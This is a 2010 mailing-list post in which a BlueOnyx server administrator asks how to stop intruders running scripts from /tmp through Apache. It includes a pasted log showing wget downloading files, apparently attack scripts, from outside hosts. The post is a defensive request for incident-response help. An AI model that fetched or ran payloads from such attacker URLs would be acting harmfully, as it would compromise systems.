[BlueOnyx:05934] Re: hacker scripts
Gerald Waugh
gwaugh at frontstreetnetworks.com
Mon Nov 29 12:28:40 -05 2010
On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
> > > How can I stop these people from downloading and running their scripts
> > > in /tmp using httpd
> >
> > You need to find out how they did it. You're either hosting someone naughty, or someone who has an insecure script. Who owns the files?
> >
> apache.apache
>
> The server has a site with Drupal and some other blog stuff
>
/tmp type ext3 (rw,noexec,nosuid)
[Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not
exist:
/home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
--06:02:38-- http://193.136.136.86/quixplorer/readme.txt
=> `readme.txt'
Connecting to 193.136.136.86:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,931 (27K) [text/plain]
0K .......... .......... ....... 100%
56.99
KB/s
06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]
--06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt
=> `dc.txt'
Resolving realezsites.com... 64.235.52.10
Connecting to realezsites.com|64.235.52.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,140 (2.1K) [text/plain]
0K .. 100%
2.40
MB/s
06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]
--
Gerald
More information about the Blueonyx
mailing list